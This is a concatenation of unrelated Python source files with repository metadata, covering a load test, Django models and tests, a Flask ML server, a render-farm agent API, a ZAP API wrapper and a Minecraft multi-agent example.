def on_start(self):
self.name = str(uuid.uuid1())
with open("questions.txt") as f:
self.questions = f.readlines()
with open("messages.txt") as f:
self.messages = f.readlines()
@task(1)
def sayHello(self):
payload = {"sender": self.name, "message": "Hello!"}
self.client.post(apiUrl, json=payload)
@task(2)
def askQuestion(self):
questionNumber = random.randint(0, len(self.questions)-1)
question = self.questions[questionNumber]
payload = {"sender": self.name, "message": question}
self.client.post(apiUrl, json=payload)
@task(3)
def saySomethingRandom(self):
messageNumber = random.randint(0, len(self.messages)-1)
message = self.messages[messageNumber]
payload = {"sender": self.name, "message": message}
self.client.post(
apiUrl, json=payload)
| 29.975 | 67 | 0.633862 |
abc616e2534ce71688707838c39b33ab9fe3a9aa | 869 | py | Python | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from yepes.apps import apps
AbstractCountry = apps.get_class('standards.abstract_models', 'AbstractCountry')
AbstractCountrySubdivision = apps.get_class('standards.abstract_models', 'AbstractCountrySubdivision')
AbstractCurrency = apps.get_class('standards.abstract_models', 'AbstractCurrency')
AbstractGeographicArea = apps.get_class('standards.abstract_models', 'AbstractGeographicArea')
AbstractLanguage = apps.get_class('standards.abstract_models', 'AbstractLanguage')
AbstractRegion = apps.get_class('standards.abstract_models', 'AbstractRegion')
class Country(AbstractCountry):
pass
class CountrySubdivision(AbstractCountrySubdivision):
pass
class Currency(AbstractCurrency):
pass
class GeographicArea(AbstractGeographicArea):
pass
class Language(AbstractLanguage):
pass
class Region(AbstractRegion):
pass
| 28.032258 | 102 | 0.802071 |
abca83db476237da93239ae54ed493e9e869002d | 48 | py | Python | randomForestRules/__init__.py | lukassykora/randomForestRules | 9da3b510a488a2453f48c220bbc289854917a86a | [
"MIT"
] | 3 | 2020-01-08T14:49:47.000Z | 2021-07-24T17:53:32.000Z | randomForestRules/__init__.py | lukassykora/randomForestRules | 9da3b510a488a2453f48c220bbc289854917a86a | [
"MIT"
] | 2 | 2020-11-01T17:00:22.000Z | 2021-08-22T17:13:06.000Z | randomForestRules/__init__.py | lukassykora/randomForestRules | 9da3b510a488a2453f48c220bbc289854917a86a | [
"MIT"
] | 4 | 2020-01-08T14:49:49.000Z | 2021-07-24T17:53:38.000Z | from .randomForestRules import RandomForestRules | 48 | 48 | 0.916667 |
abcb48c4f2cf0da6f255272f48b3091be08733b7 | 2,545 | py | Python | celery_project/daily_quote/quotes.py | engineervix/django-celery-sample | 9bb92a129bdd66d6c2259a41c690436c5c8316dc | [
"BSD-3-Clause"
] | null | null | null | celery_project/daily_quote/quotes.py | engineervix/django-celery-sample | 9bb92a129bdd66d6c2259a41c690436c5c8316dc | [
"BSD-3-Clause"
] | 194 | 2021-03-01T01:08:33.000Z | 2021-12-07T22:55:41.000Z | celery_project/daily_quote/quotes.py | engineervix/django-celery-sample | 9bb92a129bdd66d6c2259a41c690436c5c8316dc | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
"""quotery.py
This script is part of a daily celery task to fetch a quote
from a JSON file and save it to the database.
There should only be one quote at a time in the database.
On the template, we simply retrieve the quote and
display it on the website as "Quote of the Day".
The idea is to have a drop-in script that simulates an API call
so that in future, if we find a suitable quote API, we can easily
refactor accordingly and use the new API, without making significant
changes to the codebase.
"""
import os
import logging
import traceback
import re
from datetime import datetime
import json
from celery_project.daily_quote.models import Quote
logger = logging.getLogger(__name__)
def quote_index(start_date):
"""
Determine which quote (index) to retrieve from the given JSON file
based on the current date.
Args:
start_date (str): the reference start date in YYYY-MM-DD format.
This date corresponds to index 0.
Returns:
int: the index to retrieve
"""
today = datetime.today()
date_format = "%Y-%m-%d"
try:
initial_date = datetime.strptime(start_date, date_format)
except ValueError:
var = traceback.format_exc()
logger.error(var)
initial_date = datetime(2021, 3, 1)
days_since_start = (today - initial_date).days
idx = days_since_start
return abs(idx) # in case we have a negative int!
def quote_of_the_day():
"""
let's get that quote
"""
dir_path = os.path.dirname(os.path.realpath(__file__))
json_file = os.path.join(dir_path, "quotes.json")
with open(json_file, "r") as read_file:
data = json.load(read_file)
num_of_quotes = len(data)
idx = quote_index("2021-03-01")
while idx >= num_of_quotes:
idx = idx - num_of_quotes
quote = data[idx]
return quote
def sync_quote_of_the_day():
"""
We get our quote and save it to our Quote Model in the Database
We then delete older entry(ies)
"""
qod = quote_of_the_day()
# lets make sure we don't save the same entry more than once
if not Quote.objects.filter(quote=qod["text"]).exists():
quote_entry = Quote(
quote=qod["text"],
author_name=qod["author"],
)
quote_entry.save()
# Quote.objects.filter(created__lt=datetime.today()).delete()
# delete all but first:
Quote.objects.filter(
id__in=list(Quote.objects.values_list("pk", flat=True)[1:])
).delete()
| 26.510417 | 72 | 0.666012 |
abcccf0a171f8f65a41202cdaec0c176a6cff770 | 7,718 | py | Python | backend/flask_app/server.py | aPorousRock/Angular2Flask | bac2fd68207bcfa6c33b85abddac8737375d407d | [
"MIT"
] | null | null | null | backend/flask_app/server.py | aPorousRock/Angular2Flask | bac2fd68207bcfa6c33b85abddac8737375d407d | [
"MIT"
] | null | null | null | backend/flask_app/server.py | aPorousRock/Angular2Flask | bac2fd68207bcfa6c33b85abddac8737375d407d | [
"MIT"
] | null | null | null | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Entry point for the server application."""
import json
import logging
import traceback
from datetime import datetime
from flask import Response, request, jsonify, current_app
from gevent.wsgi import WSGIServer
from flask_jwt_simple import (
JWTManager, jwt_required, create_jwt, get_jwt_identity, get_jwt
)
from .http_codes import Status
from .factory import create_app, create_user
import os
import json
import nltk
import gensim
import numpy as np
from gensim import corpora, models, similarities
import pickle
import pandas as pd
from keras.models import load_model,Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.callbacks import ModelCheckpoint
from sklearn.metrics import matthews_corrcoef
from sklearn.metrics import hamming_loss
from keras import backend as K
K.set_image_dim_ordering('th')
Imagemodel = Sequential()
Imagemodel.add(Convolution2D(32, kernel_size=(3, 3),padding='same',input_shape=(3 , 100, 100)))
Imagemodel.add(Activation('relu'))
Imagemodel.add(Convolution2D(64, (3, 3)))
Imagemodel.add(Activation('relu'))
Imagemodel.add(MaxPooling2D(pool_size=(2, 2)))
Imagemodel.add(Dropout(0.25))
Imagemodel.add(Convolution2D(64,(3, 3), padding='same'))
Imagemodel.add(Activation('relu'))
Imagemodel.add(Convolution2D(64, 3, 3))
Imagemodel.add(Activation('relu'))
Imagemodel.add(MaxPooling2D(pool_size=(2, 2)))
Imagemodel.add(Dropout(0.25))
Imagemodel.add(Flatten())
Imagemodel.add(Dense(512))
Imagemodel.add(Activation('relu'))
Imagemodel.add(Dropout(0.5))
Imagemodel.add(Dense(9))
Imagemodel.add(Activation('sigmoid'))
Imagemodel.load_weights("/Users/ajinkya.parkar@ibm.com/Documents/deep/keras_multilabel/multilabel/weights.11-0.72365.hdf5")
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
Imagemodel.compile(loss='binary_crossentropy', optimizer=sgd, metrics=['accuracy'])
from IPython.display import Image
import cv2
logger = logging.getLogger(__name__)
app = create_app()
jwt = JWTManager(app)
model=load_model('LSTM5000.h5')
mod = gensim.models.Word2Vec.load('/Users/ajinkya.parkar@ibm.com/Downloads/apnews_sg/word2vec.bin');
@app.before_first_request
def init():
"""Initialize the application with defaults."""
create_user(app)
@jwt.jwt_data_loader
def add_claims_to_access_token(identity):
"""Explicitly set identity and claims for jwt."""
if identity == 'admin':
roles = 'admin'
else:
roles = 'peasant'
now = datetime.utcnow()
return {
'exp': now + current_app.config['JWT_EXPIRES'],
'iat': now,
'nbf': now,
'sub': identity,
'roles': roles
}
@app.route("/api/logout", methods=['POST'])
@jwt_required
def logout():
"""Logout the currently logged in user."""
# TODO: handle this logout properly, very weird implementation.
identity = get_jwt_identity()
if not identity:
return jsonify({"msg": "Token invalid"}), Status.HTTP_BAD_UNAUTHORIZED
logger.info('Logged out user !!')
return 'logged out successfully', Status.HTTP_OK_BASIC
@app.route('/api/login', methods=['POST'])
def login():
"""View function for login view."""
logger.info('Logged in user')
params = request.get_json()
username = params.get('username', None)
password = params.get('password', None)
if not username:
return jsonify({"msg": "Missing username parameter"}), Status.HTTP_BAD_REQUEST
if not password:
return jsonify({"msg": "Missing password parameter"}), Status.HTTP_BAD_REQUEST
# TODO Check from DB here
if username != 'admin' or password != 'admin':
return jsonify({"msg": "Bad username or password"}), Status.HTTP_BAD_UNAUTHORIZED
# Identity can be any data that is json serializable
# TODO: rather than passing expiry time here explicitly, decode token on client side. But I'm lazy.
ret = {'jwt': create_jwt(identity=username), 'exp': datetime.utcnow() + current_app.config['JWT_EXPIRES']}
return jsonify(ret), 200
@app.route('/api/protected', methods=['POST'])
@jwt_required
def get_data():
"""Get dummy data returned from the server."""
jwt_data = get_jwt()
data = {'Heroes': ['Hero1', 'Hero2', 'Hero3']}
json_response = json.dumps(data)
return Response(json_response,
status=Status.HTTP_OK_BASIC,
mimetype='application/json')
@app.route('/api/chat', methods=['POST'])
def get_chat():
"""Get dummy data returned from the server."""
jwt_data = get_jwt()
params = request.get_json()
myText = params.get('myText', None)
print(myText)
print(params)
sentend=np.ones((300,),dtype=np.float32)
sent=nltk.word_tokenize(myText)
sentvec = [mod[w] for w in sent if w in mod.vocab]
sentvec[14:]=[]
sentvec.append(sentend)
if len(sentvec)<15:
for i in range(15-len(sentvec)):
sentvec.append(sentend)
sentvec=np.array([sentvec])
predictions = model.predict(sentvec)
outputlist=[mod.most_similar([predictions[0][i]])[0][0] for i in range(5)]
output=' '.join(outputlist)
print(output)
data = {'Heroes': ['Hero1', 'Hero2', 'Hero3']}
json_response = json.dumps(output)
return Response(json_response,
status=Status.HTTP_OK_BASIC,
mimetype='application/json')
@app.route('/api/image', methods=['POST'])
def get_Image():
"""Get dummy data returned from the server."""
jwt_data = get_jwt()
params = request.get_json()
myText = params.get('myText', None)
print(myText)
print(params)
img = cv2.imread(myText)
img = cv2.resize(img,(100,100))
img = img.transpose((2,0,1))
img = img.astype('float32')
img = img/255
img = np.expand_dims(img,axis=0)
pred = Imagemodel.predict(img)
y_pred = np.array([1 if pred[0,i]>=0.6 else 0 for i in range(pred.shape[1])])
finalOutput = []
for key, value in enumerate(y_pred):
if key == 0 and value == 1:
finalOutput.append("Good for lunch")
if key == 1 and value == 1:
finalOutput.append("Good for dinner")
if key == 2 and value == 1:
finalOutput.append("Takes reservation")
if key == 3 and value == 1:
finalOutput.append("Outdoor seating")
if key == 4 and value == 1:
finalOutput.append("Restaurent is expensive")
if key == 5 and value == 1:
finalOutput.append("Has alchohol")
if key == 6 and value == 1:
finalOutput.append("Has Table Service")
if key == 7 and value == 1:
finalOutput.append("Ambience is classy")
if key == 8 and value == 1:
finalOutput.append("Good for kids")
print(finalOutput)
data = {'Heroes': ['Hero1', 'Hero2', 'Hero3']}
json_response = json.dumps(finalOutput)
return Response(json_response,
status=Status.HTTP_OK_BASIC,
mimetype='application/json')
def main():
"""Main entry point of the app."""
try:
port = 8080
ip = '0.0.0.0'
http_server = WSGIServer((ip, port),
app,
log=logging,
error_log=logging)
print("Server started at: {0}:{1}".format(ip, port))
http_server.serve_forever()
except Exception as exc:
logger.error(exc.message)
logger.exception(traceback.format_exc())
finally:
# Do something here
pass
| 31.246964 | 123 | 0.651075 |
abcd4a48420badb64f86a53b7b28f0e7b524fd7f | 1,409 | py | Python | bumblebee/users/tests.py | sthasam2/bumblebee-backend | 22057399f34cdc1edb0ef04e622c97df46532de3 | [
"Linux-OpenIB"
] | null | null | null | bumblebee/users/tests.py | sthasam2/bumblebee-backend | 22057399f34cdc1edb0ef04e622c97df46532de3 | [
"Linux-OpenIB"
] | null | null | null | bumblebee/users/tests.py | sthasam2/bumblebee-backend | 22057399f34cdc1edb0ef04e622c97df46532de3 | [
"Linux-OpenIB"
] | null | null | null | import random
import string
from django.test import TestCase
from bumblebee.users.models import CustomUser
class UserProfileTest(TestCase):
def random_string(self):
return "".join(random.choice(string.ascii_lowercase) for i in range(10))
def test_user_has_profile(self):
user = CustomUser(
email=f"{self.random_string()}@{self.random_string()}.com",
username=self.random_string(),
password="123ajkdsa34fana",
)
user.save()
self.assertTrue(hasattr(user, "profile"))
class UpdateUserTest(TestCase):
def random_string(self):
return "".join(random.choice(string.ascii_lowercase) for i in range(10))
def test_user_update(self):
user = CustomUser(
email=f"{self.random_string()}@{self.random_string()}.com",
username=self.random_string(),
password="123ajkdsa34fana",
)
user.save()
saved = CustomUser.objects.update_user(
user.id,
username="sambeg",
password="new_password",
email="sthas@dasd.com",
active=False,
)
self.assertTrue(getattr(saved, "username") == "sambeg")
self.assertTrue(saved.check_password("new_password"))
self.assertTrue(getattr(saved, "email") == "sthas@dasd.com")
self.assertTrue(getattr(saved, "active") == False)
| 29.354167 | 80 | 0.620298 |
abce73ab5ea7484cda032b4a04d06bfbe7876a23 | 16,481 | py | Python | pyfarm/agent/http/api/assign.py | guidow/pyfarm-agent | bb5d464f9f6549a3db3529a93e3d9f388b365586 | [
"Apache-2.0"
] | null | null | null | pyfarm/agent/http/api/assign.py | guidow/pyfarm-agent | bb5d464f9f6549a3db3529a93e3d9f388b365586 | [
"Apache-2.0"
] | null | null | null | pyfarm/agent/http/api/assign.py | guidow/pyfarm-agent | bb5d464f9f6549a3db3529a93e3d9f388b365586 | [
"Apache-2.0"
] | null | null | null | # No shebang line, this module is meant to be imported
#
# Copyright 2014 Oliver Palmer
# Copyright 2014 Ambient Entertainment GmbH & Co. KG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from uuid import uuid4
try:
from httplib import (
ACCEPTED, BAD_REQUEST, CONFLICT, SERVICE_UNAVAILABLE, OK)
except ImportError: # pragma: no cover
from http.client import (
ACCEPTED, BAD_REQUEST, CONFLICT, SERVICE_UNAVAILABLE, OK)
import traceback
from functools import partial
from twisted.internet import reactor
from twisted.internet.defer import DeferredList
from voluptuous import Schema, Required
from pyfarm.core.enums import WorkState, AgentState
from pyfarm.agent.config import config
from pyfarm.agent.http.core.client import post, http_retry_delay
from pyfarm.agent.http.api.base import APIResource
from pyfarm.agent.logger import getLogger
from pyfarm.agent.utility import request_from_master
from pyfarm.agent.sysinfo.memory import free_ram
from pyfarm.agent.utility import JOBTYPE_SCHEMA, TASKS_SCHEMA, JOB_SCHEMA
from pyfarm.jobtypes.core.internals import InsufficientSpaceError
from pyfarm.jobtypes.core.jobtype import JobType
from pyfarm.agent.utility import dumps
logger = getLogger("agent.http.assign")
class Assign(APIResource):
isLeaf = False # this is not really a collection of things
# Schemas used for validating the request before
# the target function will handle it. These make
# assertions about what kind of input data is required
# or not based on the agent's internal code.
SCHEMAS = {
"POST": Schema({
Required("job"): JOB_SCHEMA,
Required("jobtype"): JOBTYPE_SCHEMA,
Required("tasks"): TASKS_SCHEMA})}
def __init__(self, agent):
self.agent = agent
def post(self, **kwargs):
if request_from_master(kwargs["request"]):
config.master_contacted()
request = kwargs["request"]
request_data = kwargs["data"]
# First, get the resources we have *right now*. In some cases
# this means using the functions in pyfarm.core.sysinfo because
# entries in `config` could be slightly out of sync with the system.
memory_free = free_ram()
cpus = config["agent_cpus"]
requires_ram = request_data["job"].get("ram")
requires_cpus = request_data["job"].get("cpus")
if ("agent_id" in request_data and
request_data["agent_id"] != config["agent_id"]):
logger.error("Wrong agent_id in assignment: %s. Our id is %s",
request_data["agent_id"], config["agent_id"])
return (
dumps({"error": "You have the wrong agent. "
"I am %s." % config["agent_id"],
"agent_id": config["agent_id"]}),
BAD_REQUEST
)
elif self.agent.reannounce_lock.locked:
logger.warning("Temporarily rejecting assignment because we "
"are in the middle of a reannounce.")
return (
dumps({"error": "Agent cannot accept assignments because of a "
"reannounce in progress. Try again shortly."}),
SERVICE_UNAVAILABLE
)
elif self.agent.shutting_down:
logger.error("Rejecting assignment because the agent is in the "
"process of shutting down.")
return (
dumps({"error": "Agent cannot accept assignments because it is "
"shutting down."}),
SERVICE_UNAVAILABLE
)
elif "restart_requested" in config \
and config["restart_requested"] is True:
logger.error("Rejecting assignment because of scheduled restart.")
return (
dumps({"error": "Agent cannot accept assignments because of a "
"pending restart."}),
SERVICE_UNAVAILABLE
)
elif "agent_id" not in config:
logger.error(
"Agent has not yet connected to the master or `agent_id` "
"has not been set yet.")
return (
dumps({"error": "agent_id has not been set in the config"}),
SERVICE_UNAVAILABLE
)
# Do we have enough ram?
elif requires_ram is not None and requires_ram > memory_free:
logger.error(
"Task %s requires %sMB of ram, this agent has %sMB free. "
"Rejecting Task %s.",
request_data["job"]["id"], requires_ram, memory_free,
request_data["job"]["id"])
config["free_ram"] = memory_free
return (
dumps({"error": "Not enough ram",
"agent_ram": memory_free,
"requires_ram": requires_ram}),
BAD_REQUEST
)
# Do we have enough cpus (count wise)?
elif requires_cpus is not None and requires_cpus > cpus:
logger.error(
"Task %s requires %s CPUs, this agent has %s CPUs. "
"Rejecting Task %s.",
request_data["job"]["id"], requires_cpus, cpus,
request_data["job"]["id"])
return (
dumps({"error": "Not enough cpus",
"agent_cpus": cpus,
"requires_cpus": requires_cpus}),
BAD_REQUEST
)
new_task_ids = set(task["id"] for task in request_data["tasks"])
for assignment in config["current_assignments"].itervalues():
existing_task_ids = set(x["id"] for x in assignment["tasks"])
# If the assignment is identical to one we already have
if existing_task_ids == new_task_ids:
logger.debug(
"Ignoring repeated assignment of the same batch")
return dumps({"id": assignment["id"]}), ACCEPTED
# If there is only a partial overlap
elif existing_task_ids & new_task_ids:
logger.error("Rejecting assignment with partial overlap with "
"existing assignment.")
unknown_task_ids = new_task_ids - existing_task_ids
return (
dumps({"error": "Partial overlap of tasks",
"rejected_task_ids": list(unknown_task_ids)}),
CONFLICT
)
if not config["agent_allow_sharing"]:
for jobtype in config["jobtypes"].itervalues():
num_finished_tasks = (len(jobtype.finished_tasks) +
len(jobtype.failed_tasks))
if len(jobtype.assignment["tasks"]) > num_finished_tasks:
logger.error("Rejecting an assignment that would require "
"agent sharing")
return (
dumps({
"error": "Agent does not allow multiple "
"assignments",
"rejected_task_ids": list(new_task_ids)}),
CONFLICT
)
assignment_uuid = uuid4()
request_data.update(id=assignment_uuid)
config["current_assignments"][assignment_uuid] = request_data
logger.debug("Accepted assignment %s: %r",
assignment_uuid, request_data)
logger.info("Accept assignment from job %s with %s tasks",
request_data["job"]["title"], len(request_data["tasks"]))
def assignment_failed(result, assign_id):
logger.error(
"Assignment %s failed, result: %r, removing.", assign_id, result)
logger.error(result.getTraceback())
if (len(config["current_assignments"]) <= 1 and
not self.agent.shutting_down):
config["state"] = AgentState.ONLINE
self.agent.reannounce(force=True)
# Do not mark the assignment as failed if the reason for failing
# was that we ran out of disk space
failed = not isinstance(result.value, InsufficientSpaceError)
assignment = config["current_assignments"].pop(assign_id)
if "jobtype" in assignment:
jobtype_id = assignment["jobtype"].pop("id", None)
if jobtype_id:
instance = config["jobtypes"].pop(jobtype_id, None)
instance.stop(
assignment_failed=failed,
avoid_reassignment=not failed,
error="Error in jobtype: %r. "
"Traceback: %s" % (result,
traceback.format_exc()))
def assignment_started(_, assign_id):
logger.debug("Assignment %s has started", assign_id)
config["state"] = AgentState.RUNNING
self.agent.reannounce(force=True)
def remove_assignment(_, assign_id):
assignment = config["current_assignments"].pop(assign_id)
if "jobtype" in assignment:
jobtype_id = assignment["jobtype"].pop("id", None)
if jobtype_id:
config["jobtypes"].pop(jobtype_id, None)
def assignment_stopped(_, assign_id):
logger.debug("Assignment %s has stopped", assign_id)
if (len(config["current_assignments"]) <= 1 and
not self.agent.shutting_down):
config["state"] = AgentState.ONLINE
self.agent.reannounce(force=True)
assignment = config["current_assignments"][assign_id]
if "jobtype" in assignment:
jobtype_id = assignment["jobtype"].pop("id", None)
if jobtype_id:
jobtype = config["jobtypes"].pop(jobtype_id, None)
updates_deferred = DeferredList(
jobtype.task_update_deferreds)
updates_deferred.addBoth(remove_assignment, assign_id)
else:
config["current_assignments"].pop(assign_id)
def restart_if_necessary(_): # pragma: no cover
if "restart_requested" in config and config["restart_requested"]:
stopping = config["agent"].stop()
stopping.addCallbacks(lambda _: reactor.stop(),
lambda _: reactor.stop())
def load_jobtype_failed(result, assign_id):
logger.error(
"Loading jobtype for assignment %s failed, removing.", assign_id)
traceback = result.getTraceback()
logger.debug("Got traceback")
logger.error(traceback)
assignment = config["current_assignments"].pop(assign_id)
# Mark all tasks as failed on master and set an error message
logger.debug("Marking tasks in assignment as failed")
def post_update(post_url, post_data, task, delay=0):
post_func = partial(post, post_url, data=post_data,
callback=lambda x: result_callback(
post_url, post_data, task, x),
errback=lambda x: error_callback(
post_url, post_data, task, x))
reactor.callLater(delay, post_func)
def result_callback(cburl, cbdata, task, response):
if 500 <= response.code < 600:
logger.error(
"Error while marking task %s as failed on master, "
"retrying", task["id"])
post_update(cburl, cbdata, task, delay=http_retry_delay())
elif response.code != OK:
logger.error(
"Could not mark task %s as failed, server response "
"code was %s", task["id"], response.code)
else:
logger.info(
"Marked task %s as failed on master", task["id"])
def error_callback(cburl, cbdata, task, failure_reason):
logger.error(
"Error while marking task %s as failed, retrying",
task["id"], failure_reason)
post_update(cburl, cbdata, task, delay=http_retry_delay())
for task in assignment["tasks"]:
url = "%s/jobs/%s/tasks/%s" % (
config["master_api"], assignment["job"]["id"], task["id"])
data = {
"state": WorkState.FAILED,
"last_error": traceback}
post_update(url, data, task)
# If the loading was partially successful for some reason, there
# might already be an entry for this jobtype in the config.
# Remove it if it exists.
if "jobtype" in assignment:
jobtype_id = assignment["jobtype"].pop("id", None)
if jobtype_id:
config["jobtypes"].pop(jobtype_id, None)
def loaded_jobtype(jobtype_class, assign_id):
# TODO: report error to master
if hasattr(jobtype_class, "getTraceback"):
logger.error(jobtype_class.getTraceback())
return
# TODO: add call to prepare_for_job
# TODO: add call to spawn_persistent_process
# Instance the job type and pass in the assignment data.
instance = jobtype_class(request_data)
if not isinstance(instance, JobType):
raise TypeError(
"Expected a subclass of "
"pyfarm.jobtypes.core.jobtype.JobType")
# TODO: add callback to cleanup_after_job
# TODO: add callback to stop persistent process
try:
started_deferred, stopped_deferred = instance._start()
started_deferred.addCallback(assignment_started, assign_id)
started_deferred.addErrback(assignment_failed, assign_id)
stopped_deferred.addCallback(assignment_stopped, assign_id)
stopped_deferred.addErrback(assignment_failed, assign_id)
stopped_deferred.addBoth(restart_if_necessary)
stopped_deferred.addBoth(
lambda *args: instance._remove_tempdirs())
stopped_deferred.addBoth(
lambda *args: instance._close_logs())
stopped_deferred.addBoth(
lambda *args: instance._upload_logfile())
except Exception as e:
logger.error("Error on starting jobtype, stopping it now. "
"Error was: %r. Traceback: %s", e,
traceback.format_exc())
instance.stop(assignment_failed=True,
error="Error while loading jobtype: %r. "
"Traceback: %s" %
(e, traceback.format_exc()))
assignment = config["current_assignments"].pop(assign_id)
if "jobtype" in assignment:
jobtype_id = assignment["jobtype"].pop("id", None)
if jobtype_id:
config["jobtypes"].pop(jobtype_id, None)
# Load the job type then pass the class along to the
# callback. No errback here because all the errors
# are handled internally in this case.
jobtype_loader = JobType.load(request_data)
jobtype_loader.addCallback(loaded_jobtype, assignment_uuid)
jobtype_loader.addErrback(load_jobtype_failed, assignment_uuid)
return dumps({"id": assignment_uuid}), ACCEPTED
| 44.663957 | 81 | 0.564225 |
abcf74d3543dcbf2c7fa1eff397453f8e4095e08 | 3,044 | py | Python | python/api/src/zapv2/auth.py | psiinon/zaproxy-release | 5462b14fb337a2d4f68595a207aa3367ec71a671 | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2017-07-26T18:03:44.000Z | 2017-07-26T18:03:44.000Z | python/api/src/zapv2/auth.py | gcxtx/zappy | 3d215327addd6f2ea4ca7091a42c330c67fc30ef | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2016-02-25T10:06:53.000Z | 2016-03-29T07:49:34.000Z | python/api/src/zapv2/auth.py | gcxtx/zappy | 3d215327addd6f2ea4ca7091a42c330c67fc30ef | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-08-17T05:48:59.000Z | 2021-08-17T05:48:59.000Z | # Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2013 ZAP development team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This file was automatically generated.
"""
class auth(object):
def __init__(self, zap):
self.zap = zap
def login_url(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loginUrl/', {'contextId' : contextid})
def login_data(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loginData/', {'contextId' : contextid})
def logged_in_indicator(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loggedInIndicator/', {'contextId' : contextid})
def logout_url(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/logoutUrl/', {'contextId' : contextid})
def logout_data(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/logoutData/', {'contextId' : contextid})
def logged_out_indicator(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loggedOutIndicator/', {'contextId' : contextid})
def login(self, contextid):
return self.zap._request(self.zap.base + 'auth/action/login/', {'contextId' : contextid})
def logout(self, contextid):
return self.zap._request(self.zap.base + 'auth/action/logout/', {'contextId' : contextid})
@property
def auto_reauth_on(self):
return self.zap._request(self.zap.base + 'auth/action/autoReauthOn/').get('autoReauthOn')
@property
def auto_reauth_off(self):
return self.zap._request(self.zap.base + 'auth/action/autoReauthOff/').get('autoReauthOff')
def set_login_url(self, contextid, url, postdata=''):
return self.zap._request(self.zap.base + 'auth/action/setLoginUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata})
def set_login_indicator(self, contextid, indicator):
return self.zap._request(self.zap.base + 'auth/action/setLoginIndicator/', {'contextId' : contextid, 'indicator' : indicator})
def set_logout_url(self, contextid, url, postdata=''):
return self.zap._request(self.zap.base + 'auth/action/setLogoutUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata})
def set_logged_out_indicator(self, contextid, indicator):
return self.zap._request(self.zap.base + 'auth/action/setLoggedOutIndicator/', {'contextId' : contextid, 'indicator' : indicator})
| 42.277778 | 140 | 0.703022 |
abcf771bb1eef36b8475fbd6b6801cc8c8d640fe | 1,387 | py | Python | examples/multi_agent.py | spMohanty/marlo | 6ca3dc449fba58413b1797b28bb3e2374d62751f | [
"MIT"
] | 214 | 2018-07-26T13:48:36.000Z | 2022-03-25T11:34:53.000Z | examples/multi_agent.py | spMohanty/marlo | 6ca3dc449fba58413b1797b28bb3e2374d62751f | [
"MIT"
] | 47 | 2018-08-01T16:03:07.000Z | 2022-02-12T12:46:09.000Z | examples/multi_agent.py | spMohanty/marLo | 6ca3dc449fba58413b1797b28bb3e2374d62751f | [
"MIT"
] | 48 | 2018-07-27T15:49:01.000Z | 2021-07-18T13:55:56.000Z | #!/usr/bin/env python
# Please ensure that you have two Minecraft clients running on port 10000 and
# port 10001 by doing :
# $MALMO_MINECRAFT_ROOT/launchClient.sh -port 10000
# $MALMO_MINECRAFT_ROOT/launchClient.sh -port 10001
import marlo
client_pool = [('127.0.0.1', 10000),('127.0.0.1', 10001)]
join_tokens = marlo.make('MarLo-MazeRunner-v0',
params={
"client_pool": client_pool,
"agent_names" :
[
"MarLo-Agent-0",
"MarLo-Agent-1"
]
})
# As this is a two-agent scenario,
# there will just two join tokens
assert len(join_tokens) == 2
@marlo.threaded
def run_agent(join_token):
env = marlo.init(join_token)
observation = env.reset()
done = False
count = 0
while not done:
_action = env.action_space.sample()
obs, reward, done, info = env.step(_action)
print("reward:", reward)
print("done:", done)
print("info", info)
env.close()
# Run agent-0
thread_handler_0, _ = run_agent(join_tokens[0])
# Run agent-1
thread_handler_1, _ = run_agent(join_tokens[1])
# Wait until Both the threads complete execution
thread_handler_0.join()
thread_handler_1.join()
print("Episode Run complete")
| 30.152174 | 78 | 0.579668 |
abd0e54c20c46104555050953447f088dffd69a5 | 1,349 | py | Python | hal/libraries/convert.py | virtualanup/hal | c45757ee2d0661b6f1a5141fc67ebe94cf3ab673 | [
"MIT"
] | 3 | 2017-02-14T01:00:39.000Z | 2017-06-11T09:51:20.000Z | hal/libraries/convert.py | virtualanup/hal | c45757ee2d0661b6f1a5141fc67ebe94cf3ab673 | [
"MIT"
] | null | null | null | hal/libraries/convert.py | virtualanup/hal | c45757ee2d0661b6f1a5141fc67ebe94cf3ab673 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import random
from semantic3.units import ConversionService
from hal.library import HalLibrary
class ConvLib(HalLibrary):
"""
Conversion library
"""
